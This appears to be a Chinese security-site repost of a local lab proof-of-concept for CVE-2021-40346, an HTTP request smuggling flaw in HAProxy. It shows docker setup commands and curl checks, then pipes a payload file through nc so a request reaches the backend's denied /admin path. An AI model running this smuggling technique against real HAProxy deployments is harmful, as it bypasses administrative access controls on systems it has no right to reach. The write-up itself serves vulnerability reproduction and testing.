CVE-2021-40346(HAProxy HTTP 走私)屁噢C

admin 2022年5月23日11:01:32评论65 views字数 762阅读2分32秒阅读模式



CVE-2021-40346(HAProxy HTTP 走私)屁噢C


docker启动


$ docker build -t cve-2021-40346 .$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-403464941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4



测试:

        确认/admin被拒绝。

$ curl http://localhost:8000hello$ curl http://localhost:8000/admin<html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


        你不会/admin在日志中看到这意味着请求没有到达后端服务器,因为 HAProxy 拒绝了它。


$ docker logs pocserver start at port 8000/



然后,您可以确保它可以被 payload.txt 绕过。


$ cat payload.txt | nc localhost 8000HTTP/1.1 200 OKcontent-type: text/plaindate: Wed, 08 Sep 2021 22:31:10 GMTkeep-alive: timeout=5transfer-encoding: chunked
6hello
0



你会/admin在日志中找到


$ docker logs pocserver start at port 8000///admin


项目地址:


aHR0cHM6Ly9naXRodWIuY29tL2tucXlmMjYzL0NWRS0yMDIxLTQwMzQ2

本文始发于微信公众号(Khan安全攻防实验室):CVE-2021-40346(HAProxy HTTP 走私)屁噢C

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日11:01:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-40346(HAProxy HTTP 走私)屁噢Chttp://cn-sec.com/archives/539526.html

发表评论

匿名网友 填写信息